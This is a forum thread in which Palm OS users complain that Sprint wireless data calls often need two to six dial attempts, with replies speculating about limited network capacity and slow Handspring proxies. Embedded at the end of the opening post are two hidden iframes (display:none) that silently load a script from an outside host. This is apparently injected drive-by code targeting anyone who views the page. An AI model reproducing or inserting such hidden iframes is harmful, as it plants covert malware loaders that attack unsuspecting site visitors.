+ Reply to Thread

Unhappy Need to Dial Two or Three Times Before Internet Connection Established

When trying to use a Palm OS application that utilizes a PPP Internet connection (e.g., the Blazer browser, Eudora, etc.), I find that I often have to dial two or three times before the connection is established.

When I have the problems, the call initially dials and connects. Then, it stalls while waiting for "established" to appear. Finally, it disconnects after about ten seconds.

However, if I try it again (or maybe a third time), I'll establish the connection - everything works just fine at that point.

It doesn't appears to be result of a strong or weak connection; the number of bars doesn't appear to be a factor.

Does anyone else have this problem?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

All the time.

I think the problem is that Sprint can only handle a VERY limited number of simultaneous wireless data calls in any given area (NOTHING to do with wireless bandwidth or signal strength), and the number of users has probably grown exponentially over the past month thanks to the i300.

I could be wrong, but I suspect that data calls are routed from the tower to the nearest NOC, and the NOC itself can only handle a limited number of internet users... and an even MORE limited number of people actually making modem calls to arbitrary numbers (since the NOC's hardware ultimately has to mate such calls to a real modem bank somewhere and allocate one for your exclusive use for the duration of the call).

I suspect the situation will only worsen until Sprint finally rolls out its new high-speed service next year [the one we won't be able to take advantage of], because they won't want to waste money on network improvements that will be mostly obsolete by the end of next year anyway. The only way they're going to upgrade it is if they believe they're losing business users as a result (personal users dipping into their 2,000+ night/weekend minutes don't count for much).

Administrator

Arrow

miami is on the money i believe..

when you make a data call, you are routed to another location closest to you that handles only data calls.. and the ability to connect all the calls has a limit. i may have had that happen once or twice to me since the Wireless web has been established on sprint ('99).

when i lived in chattannoga, my data calls were routed to knoxville, nearly 100 miles away... now im in cincinati, the location is there...

next time you get your bill, look on the invoice and see where your web calls route to...

same thing here.... sometimes I get through on the first try..... sometimes it takes like 5-6 tries...

Brooks

Sprint is bad, but Handspring's proxy farm is worse. I think I -MAYBE- get 4-6kbps sustained throughput with Blazer.

sustained, rock-solid 14.4kbps would be slow enough... but intermittent, bursty 4-8kbps is even worse.